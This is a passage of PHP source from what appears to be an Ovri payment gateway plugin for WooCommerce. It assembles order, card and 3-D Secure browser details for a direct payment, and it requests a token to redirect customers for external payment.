      if (!empty($order->billing_email)) {
        $email = $order->billing_email;
      }
      if (!empty($order->billing_phone)) {
        $phone = $order->billing_phone;
      }
      if (!empty($order->billing_country)) {
        $country = $order->billing_country;
      } else {
        $country = $order->shipping_country;
      }
    } else {
      $order_id = $order->get_id();
      $amount = (float) $order->get_total();

      $holder_name = mb_substr($order->get_billing_first_name() . ' ' . $order->get_billing_last_name(), 0, 32);

      if ($order->get_billing_email()) {
        //try use billing address country if set
        $email = $order->get_billing_email();
      }
      if ($order->get_billing_phone()) {
        //try use billing address country if set
        $phone = $order->get_billing_phone();
      }
      if ($order->get_billing_country()) {
        //try use billing address country if set
        $country = $order->get_billing_country();
      } else {
        //try use shipping address if billing not available
        $country = $order->get_shipping_country();
      }
    }

    //billing or shipping neither has country set, try wc default location
    if (!$country) {
      $customerDefaultLocation = wc_get_customer_default_location();
      $country = $customerDefaultLocation['country'];
    }

    //still nothing, use default
    if (!$country) {
      $country = "FR";
    }


    $crd_order_id = str_pad($order_id, 2, '0', STR_PAD_LEFT);
    $cvc = sanitize_text_field($_POST[$this->CARD_CVC]);
    $card_number = str_replace(' ', '', sanitize_text_field($_POST[$this->CARD_PAN]));
    $card_expire_array = explode('/', sanitize_text_field($_POST[$this->CARD_EXPIRY]));
    $exp_month = (int) $card_expire_array[0];
    $exp_year = (int) $card_expire_array[1];
    if ($exp_year < 100) {
      $exp_year += 2000;
    }

    //default challenge window size
    $challenge_window_size = 'full-screen';
    $availChallengeWindowSizes = [
      [600, 400],
      [500, 600],
      [390, 400],
      [250, 400]
    ];

    $ovri_screen_width = (int) sanitize_text_field($_POST['ovri_screen_width']);
    $ovri_screen_height = (int) sanitize_text_field($_POST['ovri_screen_height']);

    $ovri_color_depth = (int) sanitize_text_field($_POST['ovri_color_depth']);
    $ovri_time_zone = (int) sanitize_text_field($_POST['ovri_time_zone']);

    $ovri_browser_language = sanitize_text_field($_POST['ovri_browser_language']);


    foreach ($availChallengeWindowSizes as $aSize) {
      if ($aSize[0] > $ovri_screen_width || $aSize[1] > $ovri_screen_height) {
        //this challenge window size is not acceptable
      } else {
        $challenge_window_size = "$aSize[0]x$aSize[1]";
        break;
      }
    }

    self::log('Direct payment: Parameters have been generated successfully', "$order_id");

    return [
      'amount' => $amount,
      'currency' => get_woocommerce_currency(),
      'email' => $email,
      'phone' => $phone,
      'order_id' => $crd_order_id,
      'country' => $country,
      'payment_instrument' => [
        'pan' => $card_number,
        'exp_year' => $exp_year,
        'exp_month' => $exp_month,
        'cvc' => $cvc,
        'holder' => $holder_name
      ],
      'threeds2_data' => [
        "browser_info" => [
          "accept_header" => "text/html",
          "browser_language" => $ovri_browser_language != '' ? $ovri_browser_language : "en-US",
          "screen_width" => $ovri_screen_width != 0 ? $ovri_screen_width : 1920,
          "screen_height" => $ovri_screen_height != 0 ? $ovri_screen_height : 1040,
          'challenge_window_size' => $challenge_window_size,
          "user_agent" => $_SERVER['HTTP_USER_AGENT'] ?? "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0",
          "color_depth" => $ovri_color_depth != 0 ? $ovri_color_depth : 24,
          "time_zone" => $ovri_time_zone != 0 ? $ovri_time_zone : -60
        ],
      ]
    ];
  }

  private function external_process_payment($order_id)
  {
    //obtain token for payment processing
    global $woocommerce;
    $order = new WC_Order($order_id);
    $email = method_exists($order, 'get_billing_email') ? $order->get_billing_email() : $order->billing_email;
    $custo_firstname = method_exists($order, 'get_billing_first_name') ? $order->get_billing_first_name() : $order->billing_first_name;
    $custo_lastname = method_exists($order, 'get_billing_last_name') ? $order->get_billing_last_name() : $order->billing_last_name;
    $the_order_id = method_exists($order, 'get_id') ? $order->get_id() : $order->id;
    $the_order_key = method_exists($order, 'get_order_key') ? $order->get_order_key() : $order->order_key;
    $requestToken = array(
      'MerchantKey' => $this->get_option('ovri_gateway_api_key'),
      'amount' => $order->get_total(),
      'RefOrder' => $order_id,
      'Customer_Email' => "$email",
      'Customer_FirstName' => $custo_firstname ? $custo_firstname : $custo_lastname,
      'Customer_Name' => $custo_lastname ? $custo_lastname : $custo_firstname,
      'urlOK' => get_site_url() . '/?wc-api=wc_ovri_return&mtg_ord=' . $order_id . '',
      'urlKO' => get_site_url() . '/?wc-api=wc_ovri_return&mtg_ord=' . $order_id . '',
      'urlIPN' => get_site_url() . '/?wc-api=wc_ovri',
      'forceRedirect' => true
    );
    $getToken = $this->getToken($requestToken);
    if (!is_wp_error($getToken)) {
      $results = json_decode($getToken['body'], true);
      $explanationIS = "";
      if ($getToken['response']['code'] === 400 || $getToken['response']['code'] === 200) {
        if ($results['Explanation']) {
          foreach ($results['Explanation'] as $key => $value) {
            $explanationIS .= "<br><b>" . $key . "</b> : " . $value;
          }
        }
        if ($results['MissingParameters']) {
          $explanationIS .= "<br> List of missing parameters : ";
          foreach ($results['MissingParameters'] as $key => $value) {
            $explanationIS .= "<b>" . $value . " , ";
          }
        }
      }
      if ($getToken['response']['code'] === 200) {

        wc_add_notice(__('Ovri : ' . $results['ErrorCode'] . ' - ' . $results['ErrorDescription'] . ' - ' . $explanationIS . '', 'ovri'), 'error');
        return;
      } else if ($getToken['response']['code'] === 400) {
        wc_add_notice(__('Ovri : ' . $results['ErrorCode'] . ' - ' . $results['ErrorDescription'] . ' - ' . $explanationIS . '', 'ovri'), 'error');
        return;
      } else if ($getToken['response']['code'] === 201) {
        return array(
          'result' => 'success',
          'redirect' => ovri_universale_params()['WebUriStandard'] . $results['SACS']
        );
      } else {

        wc_add_notice(__('Ovri : Connection error', 'ovri'), 'error');

        return;
      }
    } else {
      wc_add_notice(__('Ovri : Connection error', 'ovri'), 'error');
      return;
    }
  }
}
?>